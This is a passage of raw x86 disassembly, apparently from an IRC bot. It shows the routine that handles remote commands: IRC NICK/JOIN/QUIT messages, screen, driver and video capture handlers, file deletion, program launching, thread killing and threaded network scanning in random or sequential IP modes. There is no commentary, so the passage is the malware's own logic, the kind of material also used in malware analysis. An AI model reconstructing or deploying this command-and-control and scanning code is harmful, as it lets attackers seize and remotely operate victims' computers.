push offset dword_430D1C
jmp loc_413BFD
; ---------------------------------------------------------------------------
loc_413312: ; CODE XREF: sub_40EE72+22E1�j
; sub_40EE72+22F8�j
push edi
push [ebp+arg_1C]
call sub_417880
pop ecx
test eax, eax
pop ecx
jz loc_414F47
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jz loc_4133B6
push esi
push [ebp+var_C]
call sub_417880
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_41339E
push esi
lea eax, [ebp+var_2DC]
push [ebp+var_8C]
push [ebp+var_90]
push [ebp+var_94]
push offset dword_430F48
push eax
call sub_4172B0
lea eax, [ebp+var_2DC]
push 1FFh
push eax
push [ebp+arg_0]
call sub_418C10
add esp, 24h
lea eax, [ebp+var_2DC]
push esi
push edi
push offset dword_430CE8
push eax
call sub_4172B0
add esp, 10h
inc [ebp+arg_24]
jmp loc_414AC3
; ---------------------------------------------------------------------------
loc_41339E: ; CODE XREF: sub_40EE72+44D1�j
lea eax, [ebp+var_2DC]
push offset dword_430CA8
push eax
call sub_4172B0
pop ecx
pop ecx
jmp loc_414AC3
; ---------------------------------------------------------------------------
loc_4133B6: ; CODE XREF: sub_40EE72+44BC�j
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_40BB8C
add esp, 0Ch
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
lea eax, [ebp+var_2DC]
push edi
push offset dword_430C80
push 200h
push eax
call sub_41782A
add esp, 10h
jmp loc_414AC3
; ---------------------------------------------------------------------------
loc_413400: ; CODE XREF: sub_40EE72+22B3�j
; sub_40EE72+22CA�j
push offset aScreen ; "screen"
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_413463
cmp [ebp+esi+var_8C], ebx
jz short loc_413450
push [ebp+esi+var_8C]
call sub_4085B3
cmp eax, 1
pop ecx
jnz short loc_413449
push [ebp+esi+var_8C]
lea eax, [ebp+var_2DC]
push offset dword_430C3C
push eax
call sub_4172B0
add esp, 0Ch
jmp short loc_413463
; ---------------------------------------------------------------------------
loc_413449: ; CODE XREF: sub_40EE72+45B8�j
push offset dword_430C00
jmp short loc_413455
; ---------------------------------------------------------------------------
loc_413450: ; CODE XREF: sub_40EE72+45A6�j
push offset dword_430BB8
loc_413455: ; CODE XREF: sub_40EE72+45DC�j
lea eax, [ebp+var_2DC]
push eax
call sub_4172B0
pop ecx
pop ecx
loc_413463: ; CODE XREF: sub_40EE72+459D�j
; sub_40EE72+45D5�j
push offset aDrivers ; "drivers"
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_4134FA
mov [ebp+arg_0], ebx
loc_41347B: ; CODE XREF: sub_40EE72+4673�j
lea eax, [ebp+var_75C]
push 1FFh
push eax
lea eax, [ebp+var_3F8]
push 0FFh
push eax
push [ebp+arg_0]
call ds:dword_43ADC8
test eax, eax
jz short loc_4134DE
lea eax, [ebp+var_75C]
push eax
lea eax, [ebp+var_3F8]
push eax
lea eax, [ebp+var_15B0]
push [ebp+arg_0]
push offset dword_430B7C
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_15B0]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 28h
loc_4134DE: ; CODE XREF: sub_40EE72+462C�j
inc [ebp+arg_0]
cmp [ebp+arg_0], 0Ah
jl short loc_41347B
lea eax, [ebp+var_2DC]
push offset dword_430B48
push eax
call sub_4172B0
pop ecx
pop ecx
loc_4134FA: ; CODE XREF: sub_40EE72+4600�j
push offset aFrame ; "frame"
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_4135A0
cmp [ebp+esi+var_8C], ebx
jz short loc_41358D
cmp [ebp+esi+var_88], ebx
jz short loc_41358D
cmp [ebp+esi+var_84], ebx
jz short loc_41358D
mov eax, [ebp+esi+var_80]
cmp eax, ebx
jz short loc_41358D
push eax
call sub_41781F
pop ecx
push eax
push [ebp+esi+var_84]
call sub_41781F
pop ecx
push eax
push [ebp+esi+var_88]
call sub_41781F
pop ecx
push eax
push [ebp+esi+var_8C]
call sub_4087EE
add esp, 10h
test eax, eax
jnz short loc_413586
push [ebp+esi+var_8C]
lea eax, [ebp+var_2DC]
push offset dword_430B04
push eax
call sub_4172B0
add esp, 0Ch
jmp short loc_4135A0
; ---------------------------------------------------------------------------
loc_413586: ; CODE XREF: sub_40EE72+46F5�j
push offset dword_430AC0
jmp short loc_413592
; ---------------------------------------------------------------------------
loc_41358D: ; CODE XREF: sub_40EE72+46A4�j
; sub_40EE72+46AD�j ...
push offset dword_430A78
loc_413592: ; CODE XREF: sub_40EE72+4719�j
lea eax, [ebp+var_2DC]
push eax
call sub_4172B0
pop ecx
pop ecx
loc_4135A0: ; CODE XREF: sub_40EE72+4697�j
; sub_40EE72+4712�j
push offset aVideo ; "video"
push edi
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz loc_413A62
mov eax, [ebp+esi+var_8C]
cmp eax, ebx
mov [ebp+arg_18], eax
jz short loc_413639
mov eax, [ebp+esi+var_88]
cmp eax, ebx
mov [ebp+arg_0], eax
jz short loc_413639
mov eax, [ebp+esi+var_84]
cmp eax, ebx
mov [ebp+arg_10], eax
jz short loc_413639
mov edi, [ebp+esi+var_80]
cmp edi, ebx
jz short loc_413639
mov esi, [ebp+esi+var_7C]
cmp esi, ebx
jz short loc_413639
push esi
call sub_41781F
pop ecx
push eax
push edi
call sub_41781F
pop ecx
push eax
push [ebp+arg_10]
call sub_41781F
pop ecx
push eax
push [ebp+arg_0]
call sub_41781F
pop ecx
push eax
push [ebp+arg_18]
call sub_4089E7
add esp, 14h
test eax, eax
jnz short loc_41362F
push [ebp+arg_18]
push offset dword_430A34
jmp loc_411888
; ---------------------------------------------------------------------------
loc_41362F: ; CODE XREF: sub_40EE72+47AE�j
push offset dword_4309E4
jmp loc_413A54
; ---------------------------------------------------------------------------
loc_413639: ; CODE XREF: sub_40EE72+474F�j
; sub_40EE72+475D�j ...
push offset dword_430998
jmp loc_413A54
; ---------------------------------------------------------------------------
loc_413643: ; CODE XREF: sub_40EE72+1CF0�j
; sub_40EE72+1D07�j
push offset aR ; "r"
push edi
call sub_4179A8
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz short loc_4136BE
mov ebx, 200h
push esi
lea eax, [ebp+var_2DC]
push ebx
push eax
call sub_41900C
add esp, 0Ch
loc_41366C: ; CODE XREF: sub_40EE72+4829�j
test eax, eax
jz short loc_41369D
push 1
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
push esi
lea eax, [ebp+var_2DC]
push ebx
push eax
call sub_41900C
add esp, 20h
jmp short loc_41366C
; ---------------------------------------------------------------------------
loc_41369D: ; CODE XREF: sub_40EE72+47FC�j
push esi
call sub_417900
pop ecx
lea eax, [ebp+var_2DC]
push edi
push offset dword_430964
push eax
call sub_4172B0
add esp, 0Ch
jmp loc_4110FD
; ---------------------------------------------------------------------------
loc_4136BE: ; CODE XREF: sub_40EE72+47E2�j
push edi
push offset dword_430934
jmp loc_4110B1
; ---------------------------------------------------------------------------
loc_4136C9: ; CODE XREF: sub_40EE72+1CC2�j
; sub_40EE72+1CD9�j
cmp [ebp+var_C], ebx
jz loc_414F47
push edi
push [ebp+var_C]
call sub_417880
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_414F47
push offset asc_42A660 ; "\n"
push esi
call sub_4179D0
push esi
call sub_40B358
add esp, 0Ch
test eax, eax
jnz short loc_413709
push offset dword_4308F8
jmp loc_413A54
; ---------------------------------------------------------------------------
loc_413709: ; CODE XREF: sub_40EE72+488B�j
push esi
push offset dword_4308D0
jmp loc_414AB4
; ---------------------------------------------------------------------------
loc_413714: ; CODE XREF: sub_40EE72+1C94�j
; sub_40EE72+1CAB�j
cmp [ebp+var_C], ebx
jz loc_414F47
push edi
push [ebp+var_C]
call sub_417880
pop ecx
cmp eax, ebx
pop ecx
jz loc_414F47
push eax
call sub_40AAFA
test eax, eax
pop ecx
jnz short loc_413745
push offset unk_4308A4
jmp loc_413A54
; ---------------------------------------------------------------------------
loc_413745: ; CODE XREF: sub_40EE72+48C7�j
push offset dword_430878
jmp loc_413A54
; ---------------------------------------------------------------------------
loc_41374F: ; CODE XREF: sub_40EE72+1C66�j
; sub_40EE72+1C7D�j
push 7Fh
lea eax, [ebp+var_6EC]
push edi
push eax
call sub_418C10
mov esi, [ebp+esi+var_8C]
add esp, 0Ch
cmp esi, ebx
jz short loc_41377E
push 7Fh
lea eax, [ebp+var_66C]
push esi
push eax
call sub_418C10
add esp, 0Ch
loc_41377E: ; CODE XREF: sub_40EE72+48F8�j
push 7Fh
lea eax, [ebp+var_5EC]
push [ebp+var_8C]
push eax
call sub_418C10
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_6F0], eax
mov eax, [ebp+var_8]
mov [ebp+var_568], eax
mov eax, [ebp+var_4]
mov [ebp+var_564], eax
push edi
lea eax, [ebp+var_2DC]
push offset dword_430850
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push 15h
push eax
call sub_416D5C
add esp, 18h
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_6F0]
push ebx
push eax
push offset sub_40BC4B
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_41381F
loc_413809: ; CODE XREF: sub_40EE72+49AB�j
cmp [ebp+var_560], ebx
jnz loc_414AC3
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_413809
; ---------------------------------------------------------------------------
loc_41381F: ; CODE XREF: sub_40EE72+4995�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset unk_430804
jmp loc_414AB4
; ---------------------------------------------------------------------------
loc_413830: ; CODE XREF: sub_40EE72+1C38�j
; sub_40EE72+1C4F�j
push ebx
push [ebp+var_8C]
push [ebp+arg_4]
push edi
call sub_406387
add esp, 10h
push edi
push offset dword_4307E0
jmp loc_414F40
; ---------------------------------------------------------------------------
loc_41384E: ; CODE XREF: sub_40EE72+1C0A�j
; sub_40EE72+1C21�j
push 14h
lea eax, [ebp+var_708]
push ebx
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_6F4]
push edi
push offset aS_3 ; "%s"
push eax
call sub_4172B0
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_710], eax
lea eax, [ebp+var_D8]
push eax
lea eax, [ebp+var_5F0]
push 80h
push eax
call sub_41782A
mov eax, [ebp+var_4]
add esp, 0Ch
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_5F0]
push eax
lea eax, [ebp+var_6F4]
push eax
lea eax, [ebp+var_2DC]
push offset dword_4307AC
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push 12h
push eax
call sub_416D5C
add esp, 1Ch
mov [ebp+var_56C], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_710]
push ebx
push eax
push offset sub_40C512
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_56C]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_413927
loc_413911: ; CODE XREF: sub_40EE72+4AB3�j
cmp [ebp+var_560], ebx
jnz loc_414E11
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_413911
; ---------------------------------------------------------------------------
loc_413927: ; CODE XREF: sub_40EE72+4A9D�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset dword_432C7C
jmp loc_414E02
; ---------------------------------------------------------------------------
loc_413938: ; CODE XREF: sub_40EE72+1BDC�j
; sub_40EE72+1BF3�j
push edi
call ds:dword_424158 ;; DeleteFileA
test eax, eax
jz short loc_413962
push edi
push offset dword_430780
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_41782A
add esp, 10h
jmp loc_4110DC
; ---------------------------------------------------------------------------
loc_413962: ; CODE XREF: sub_40EE72+4ACF�j
push offset dword_431128
call sub_40AA35
pop ecx
push eax
jmp loc_414564
; ---------------------------------------------------------------------------
loc_413973: ; CODE XREF: sub_40EE72+1BAE�j
; sub_40EE72+1BC5�j
push edi
call sub_41781F
push eax
call sub_415419
pop ecx
pop ecx
push 1
pop esi
cmp eax, esi
push edi
jnz short loc_413990
push offset unk_430748
jmp short loc_413995
; ---------------------------------------------------------------------------
loc_413990: ; CODE XREF: sub_40EE72+4B15�j
push offset unk_430704
loc_413995: ; CODE XREF: sub_40EE72+4B1C�j
lea eax, [ebp+var_2DC]
push eax
call sub_4172B0
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz loc_411100
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
jmp loc_411100
; ---------------------------------------------------------------------------
loc_4139CE: ; CODE XREF: sub_40EE72+1B80�j
; sub_40EE72+1B97�j
push ebx
push ebx
push edi
push [ebp+var_4]
push ebx
push [ebp+arg_4]
call sub_41518A
add esp, 18h
cmp eax, 1
push edi
jnz short loc_4139F0
push offset unk_4306D0
jmp loc_4110B1
; ---------------------------------------------------------------------------
loc_4139F0: ; CODE XREF: sub_40EE72+4B72�j
push offset unk_430690
jmp loc_4110B1
; ---------------------------------------------------------------------------
loc_4139FA: ; CODE XREF: sub_40EE72+1B52�j
; sub_40EE72+1B69�j
push edi
call ds:dword_43ADD8 ;; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+arg_0], eax
jz short loc_413A34
push 2
lea eax, [ebp+arg_0]
push 4
push eax
call ds:dword_43AD50 ;; gethostbyaddr
cmp eax, ebx
jz short loc_413A4F
push dword ptr [eax]
loc_413A1D: ; CODE XREF: sub_40EE72+4BDB�j
push edi
lea eax, [ebp+var_2DC]
push offset dword_430664
push eax
call sub_4172B0
add esp, 10h
jmp short loc_413A62
; ---------------------------------------------------------------------------
loc_413A34: ; CODE XREF: sub_40EE72+4B95�j
push edi
call ds:dword_43AE1C ;; gethostbyname
cmp eax, ebx
jz short loc_413A4F
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call ds:dword_43AE24 ;; inet_ntoa
push eax
jmp short loc_413A1D
; ---------------------------------------------------------------------------
loc_413A4F: ; CODE XREF: sub_40EE72+4BA7�j
; sub_40EE72+4BCB�j
push offset dword_43062C
loc_413A54: ; CODE XREF: sub_40EE72+3E2D�j
; sub_40EE72+3FBC�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172B0
pop ecx
pop ecx
loc_413A62: ; CODE XREF: sub_40EE72+2A25�j
; sub_40EE72+3B35�j ...
cmp [ebp+var_8], ebx
jnz loc_414AC3
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
jmp loc_414AC3
; ---------------------------------------------------------------------------
loc_413A8C: ; CODE XREF: sub_40EE72+1B24�j
; sub_40EE72+1B3B�j
push 7Fh
push edi
push [ebp+arg_14]
call sub_418C10
add esp, 0Ch
push edi
push offset dword_4305F8
jmp loc_410E48
; ---------------------------------------------------------------------------
loc_413AA5: ; CODE XREF: sub_40EE72+1AF6�j
; sub_40EE72+1B0D�j
push 5
push ebx
push ebx
push edi
push offset aOpen ; "open"
push ebx
call ds:dword_43AD0C
test eax, eax
push edi
jz short loc_413AC5
push offset unk_4305BC
jmp loc_4110B1
; ---------------------------------------------------------------------------
loc_413AC5: ; CODE XREF: sub_40EE72+4C47�j
push offset unk_430578
jmp loc_4110B1
; ---------------------------------------------------------------------------
loc_413ACF: ; CODE XREF: sub_40EE72+1AC8�j
; sub_40EE72+1ADF�j
mov al, [edi]
mov ds:byte_42F5C4, al
movsx eax, byte ptr [edi]
push eax
push offset dword_430544
jmp loc_410E48
; ---------------------------------------------------------------------------
loc_413AE4: ; CODE XREF: sub_40EE72+1A9A�j
; sub_40EE72+1AB1�j
push edi
call sub_41781F
test eax, eax
pop ecx
jle loc_414F47
push edi
call sub_41781F
cmp eax, 400h
pop ecx
jge loc_414F47
push ebx
push ebx
lea eax, [ebp+var_B8]
push 2
push eax
call sub_415D01
add esp, 10h
push eax
lea eax, [ebp+var_2DC]
push offset dword_430E94
push eax
call sub_4172B0
add esp, 0Ch
jmp loc_412FD0
; ---------------------------------------------------------------------------
loc_413B32: ; CODE XREF: sub_40EE72+1A6C�j
; sub_40EE72+1A83�j
push edi
call sub_41781F
test eax, eax
pop ecx
jle loc_40F239
push edi
call sub_41781F
cmp eax, 400h
pop ecx
jge loc_40F239
push offset aQuitLater ; "QUIT :later\r\n"
push edi
call sub_41781F
imul eax, 234h
pop ecx
push ds:dword_4407FC[eax]
call sub_40D633
pop ecx
pop ecx
push 1F4h
call ds:dword_424064 ;; Sleep
push edi
call sub_41781F
imul eax, 234h
pop ecx
push ds:dword_4407FC[eax]
call ds:dword_43AE30 ;; closesocket
push [ebp+var_10]
push edi
call sub_41781F
imul eax, 234h
pop ecx
push ds:dword_440804[eax]
call ds:dword_424168 ;; TerminateThread
push edi
call sub_41781F
imul eax, 234h
push edi
mov ds:dword_440804[eax], ebx
call sub_41781F
imul eax, 234h
pop ecx
pop ecx
mov byte ptr ds:dword_4405F0[eax], bl
jmp loc_40F239
; ---------------------------------------------------------------------------
loc_413BDD: ; CODE XREF: sub_40EE72+1A3E�j
; sub_40EE72+1A55�j
push edi
push offset aAll ; "all"
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jnz short loc_413C1B
call sub_416F25
cmp eax, ebx
jle short loc_413C11
push eax
push offset dword_4304F8
loc_413BFD: ; CODE XREF: sub_40EE72+15E2�j
; sub_40EE72+2A8F�j ...
lea eax, [ebp+var_2DC]
push eax
call sub_4172B0
loc_413C09: ; CODE XREF: sub_40EE72+3CA4�j
add esp, 0Ch
jmp loc_41460C
; ---------------------------------------------------------------------------
loc_413C11: ; CODE XREF: sub_40EE72+4D83�j
push offset dword_4304C0
jmp loc_4145FE
; ---------------------------------------------------------------------------
loc_413C1B: ; CODE XREF: sub_40EE72+4D7A�j
mov eax, [ebp+var_C0]
lea edi, [eax+1]
cmp edi, 20h
jnb loc_40F239
lea eax, [ebp+edi*4+var_94]
mov [ebp+arg_24], eax
loc_413C37: ; CODE XREF: sub_40EE72+4E36�j
mov eax, [ebp+arg_24]
mov esi, [eax]
cmp esi, ebx
jz loc_40F239
push esi
call sub_41781F
push eax
call sub_416E97
pop ecx
pop ecx
test eax, eax
push esi
jz short loc_413C5E
push offset dword_43048C
jmp short loc_413C63
; ---------------------------------------------------------------------------
loc_413C5E: ; CODE XREF: sub_40EE72+4DE3�j
push offset dword_430450
loc_413C63: ; CODE XREF: sub_40EE72+4DEA�j
lea eax, [ebp+var_2DC]
push eax
call sub_4172B0
add esp, 0Ch
cmp [ebp+var_8], ebx
jnz short loc_413C93
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
loc_413C93: ; CODE XREF: sub_40EE72+4E03�j
lea eax, [ebp+var_2DC]
push eax
call sub_40BF6D
add [ebp+arg_24], 4
inc edi
cmp edi, 20h
pop ecx
jb short loc_413C37
jmp loc_40F239
; ---------------------------------------------------------------------------
loc_413CAF: ; CODE XREF: sub_40EE72+1A10�j
; sub_40EE72+1A27�j
cmp [ebp+var_C], ebx
jz loc_414F47
push edi
push [ebp+var_C]
call sub_417880
mov esi, eax
pop ecx
cmp esi, ebx
pop ecx
jz loc_414F47
push esi
push offset dword_428598
push [ebp+arg_4]
call sub_40D633
add esp, 0Ch
push esi
push offset dword_430428
jmp loc_414F40
; ---------------------------------------------------------------------------
loc_413CE9: ; CODE XREF: sub_40EE72+19E2�j
; sub_40EE72+19F9�j
push edi
push offset dword_430DC4
push [ebp+arg_4]
call sub_40D633
add esp, 0Ch
push edi
push offset dword_4303F8
jmp loc_414F40
; ---------------------------------------------------------------------------
loc_413D05: ; CODE XREF: sub_40EE72+19B4�j
; sub_40EE72+19CB�j
push [ebp+esi+var_8C]
push edi
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 10h
push edi
push offset dword_4303C8
jmp loc_414F40
; ---------------------------------------------------------------------------
loc_413D28: ; CODE XREF: sub_40EE72+1986�j
; sub_40EE72+199D�j
push edi
push offset aNickS ; "NICK %s\r\n"
push [ebp+arg_4]
call sub_40D633
add esp, 0Ch
push edi
push offset dword_430394
jmp loc_414F40
; ---------------------------------------------------------------------------
loc_413D44: ; CODE XREF: sub_40EE72+194B�j
; sub_40EE72+1960�j
mov al, ds:byte_42F5F2
mov [ebp+arg_0], ebx
cmp al, bl
mov edx, offset byte_42F5F2
jz loc_40F239
mov ecx, edx
loc_413D5B: ; CODE XREF: sub_40EE72+4EF1�j
inc [ebp+arg_0]
add ecx, 0Bh
cmp [ecx], bl
jnz short loc_413D5B
cmp al, bl
jz loc_40F239
mov [ebp+arg_18], edx
loc_413D70: ; CODE XREF: sub_40EE72+51BC�j
push 8
call sub_416FA4
pop ecx
mov ecx, eax
mov eax, 190h
cdq
idiv [ebp+arg_0]
add eax, ecx
cmp eax, 3E8h
jle short loc_413DBF
push ecx
lea eax, [ebp+var_2DC]
push offset unk_4316D8
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push [ebp+var_4]
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 20h
jmp loc_414025
; ---------------------------------------------------------------------------
loc_413DBF: ; CODE XREF: sub_40EE72+4F18�j
or [ebp+var_314], 0FFFFFFFFh
cmp ds:dword_42ACB0, ebx
mov [ebp+var_318], 64h
mov [ebp+var_32C], 7
mov [ebp+var_328], 270Fh
mov [ebp+arg_0], ebx
jz short loc_413E30
mov eax, [ebp+arg_18]
mov edi, offset dword_42ACB0
lea esi, [eax-0Ah]
loc_413DFA: ; CODE XREF: sub_40EE72+4FA0�j
lea eax, [edi-28h]
push esi
push eax
call sub_4176D0
pop ecx
test eax, eax
pop ecx
jz short loc_413E16
inc [ebp+arg_0]
add edi, 3Ch
cmp [edi], ebx
jnz short loc_413DFA
jmp short loc_413E30
; ---------------------------------------------------------------------------
loc_413E16: ; CODE XREF: sub_40EE72+4F96�j
mov eax, [ebp+arg_0]
mov ecx, eax
mov [ebp+var_314], eax
imul ecx, 3Ch
mov ecx, ds:dword_42ACB0[ecx]
mov [ebp+var_330], ecx
loc_413E30: ; CODE XREF: sub_40EE72+4F7B�j
; sub_40EE72+4FA2�j
cmp [ebp+var_330], ebx
jz loc_414039
push 10h
lea eax, [ebp+arg_10]
pop esi
push eax
lea eax, [ebp+var_2EC]
push eax
mov [ebp+arg_10], esi
push [ebp+arg_4]
call ds:dword_43AD3C ;; getsockname
mov al, [ebp+var_9C7]
push esi
neg al
sbb eax, eax
and ax, 100h
add eax, 0FFFFh
and [ebp+var_2E8], eax
push [ebp+var_2E8]
call ds:dword_43AE24 ;; inet_ntoa
push eax
lea eax, [ebp+var_444]
push eax
call sub_418C10
xor eax, eax
cmp [ebp+var_9C7], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_444]
push eax
call sub_418F10
add esp, 14h
cmp edi, ebx
mov byte ptr [ebp+arg_24+3], bl
jle short loc_413ED2
loc_413EB0: ; CODE XREF: sub_40EE72+505E�j
cmp eax, ebx
jz short loc_413ED2
mov byte ptr [eax], 78h
lea eax, [ebp+var_444]
push 30h
push eax
call sub_418F10
inc byte ptr [ebp+arg_24+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_24+3]
cmp ecx, edi
jl short loc_413EB0
loc_413ED2: ; CODE XREF: sub_40EE72+503C�j
; sub_40EE72+5040�j
mov eax, [ebp+arg_4]
push [ebp+var_8C]
mov esi, [ebp+var_4]
mov [ebp+var_334], eax
mov eax, [ebp+var_8]
mov edi, 80h
mov [ebp+var_308], eax
lea eax, [ebp+var_434]
push edi
push eax
mov [ebp+var_304], 1
mov [ebp+var_30C], esi
call sub_41782A
push offset byte_436EDC
push offset aF ; "#f"
call sub_4176D0
add esp, 14h
test eax, eax
jz short loc_413F3C
push offset aF ; "#f"
lea eax, [ebp+var_3B4]
push edi
push eax
call sub_41782A
add esp, 0Ch
jmp short loc_413F42
; ---------------------------------------------------------------------------
loc_413F3C: ; CODE XREF: sub_40EE72+50B1�j
mov [ebp+var_3B4], bl
loc_413F42: ; CODE XREF: sub_40EE72+50C8�j
cmp [ebp+var_304], ebx
mov eax, offset aRandom_0 ; "Random"
jnz short loc_413F54
mov eax, offset aSequential ; "Sequential"
loc_413F54: ; CODE XREF: sub_40EE72+50DB�j
push [ebp+var_318]
lea ecx, [ebp+var_444]
push [ebp+var_328]
push [ebp+var_32C]
push [ebp+var_330]
push ecx
push eax
lea eax, [ebp+var_2DC]
push offset unk_43031C
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push 8
push eax
call sub_416D5C
add esp, 2Ch
mov [ebp+var_324], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_444]
push ebx
push eax
push offset sub_40797F
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_324]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_413FDE
loc_413FCC: ; CODE XREF: sub_40EE72+516A�j
cmp [ebp+var_300], ebx
jnz short loc_413FF9
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_413FCC
; ---------------------------------------------------------------------------
loc_413FDE: ; CODE XREF: sub_40EE72+5158�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2DC]
push offset unk_4315C8
push eax
call sub_4172B0
add esp, 0Ch
loc_413FF9: ; CODE XREF: sub_40EE72+5160�j
cmp [ebp+var_8], ebx
jnz short loc_414018
push ebx
lea eax, [ebp+var_2DC]
push esi
push eax
push [ebp+var_8C]
push [ebp+arg_4]
call sub_40D679
add esp, 14h
loc_414018: ; CODE XREF: sub_40EE72+518A�j
lea eax, [ebp+var_2DC]
push eax
call sub_40BF6D
pop ecx
loc_414025: ; CODE XREF: sub_40EE72+4F48�j
add [ebp+arg_18], 0Bh
mov eax, [ebp+arg_18]
cmp [eax], bl
jnz loc_413D70
jmp loc_40F239
; ---------------------------------------------------------------------------
loc_414039: ; CODE XREF: sub_40EE72+3108�j
; sub_40EE72+4FC4�j
push offset unk_4302D8
jmp loc_4145FE
; ---------------------------------------------------------------------------
loc_414043: ; CODE XREF: sub_40EE72+1921�j
; sub_40EE72+1936�j
push [ebp+var_8C]
lea eax, [ebp+var_A4]
push 80h
push eax
call sub_41782A
mov eax, [ebp+arg_4]
add esp, 0Ch
mov [ebp+var_A8], eax
mov eax, [ebp+var_4]
mov [ebp+var_20], eax
mov eax, [ebp+var_8]
mov [ebp+var_1C], eax
push offset unk_4302A0
lea eax, [ebp+var_2DC]
push 200h
push eax
call sub_41782A
push ebx
lea eax, [ebp+var_2DC]
push 1Eh
push eax
call sub_416D5C
add esp, 18h
mov [ebp+var_24], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_A8]
push ebx
push eax
push offset sub_409037
push ebx
push ebx
call ds:dword_4240A0 ;; CreateThread
mov ecx, [ebp+var_24]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_440804[ecx], eax
jz short loc_4140DC
loc_4140C9: ; CODE XREF: sub_40EE72+5268�j
cmp [ebp+var_18], ebx
jnz loc_414E11
push 32h
call ds:dword_424064 ;; Sleep
jmp short loc_4140C9
; ---------------------------------------------------------------------------
loc_4140DC: ; CODE XREF: sub_40EE72+5255�j
call ds:dword_42408C ;; RtlGetLastWin32Error
push eax
push offset unk_430254
jmp loc_414E02
; ---------------------------------------------------------------------------
loc_4140ED: ; CODE XREF: sub_40EE72+18F7�j
; sub_40EE72+190C�j
push 4
call sub_416FA4
test eax, eax
pop ecx
jle short loc_414103
push offset unk_430228
jmp loc_410D38
; ---------------------------------------------------------------------------
loc_414103: ; CODE XREF: sub_40EE72+5285�j
mov eax, [ebp+esi+var_90]
cmp eax, ebx
jz short loc_414126
push eax
mov edi, 104h
lea eax, [ebp+var_7FC]
push edi
push eax
call sub_41782A
add esp, 0Ch
jmp short loc_41413A
; ---------------------------------------------------------------------------
loc_414126: ; CODE XREF: sub_40EE72+529A�j
mov edi, 104h
lea eax, [ebp+var_7FC]
push edi
push eax
push ebx
call ds:off_424094
loc_41413A: ; CODE XREF: sub_40EE72+52B2�j
mov esi, [ebp+esi+var_8C]
cmp esi, ebx
jnz short loc_41414A
mov esi, offset byte_42F674
loc_41414A: ; CODE XREF: sub_40EE72+52D1�j
push esi
lea eax, [ebp+var_6F8]
push edi
push eax
call sub_41782A
mov eax, ds:dword_42F5AC
push 7Fh
push [ebp+var_8C]
mov [ebp+var_5EC], eax
mov eax, [ebp+arg_4]
mov [ebp+var_5F0], ebx
mov [ebp+var_800], eax
lea eax, [ebp+var_5E8]
push eax
call sub_418C10
mov eax, [ebp+var_4]
add esp, 18h
mov [ebp+var_568], eax
mov eax, [ebp+var_8]
mov [ebp+var_564], eax
lea eax, [ebp+var_6F8]
push eax
lea eax, [ebp+var_7FC]
push eax
lea eax, [ebp+var_2DC]
push [ebp+var_5EC]
push offset unk_42B328
push eax
call sub_4172B0
push ebx
lea eax, [ebp+var_2DC]
push 4
push eax
call sub_416D5C
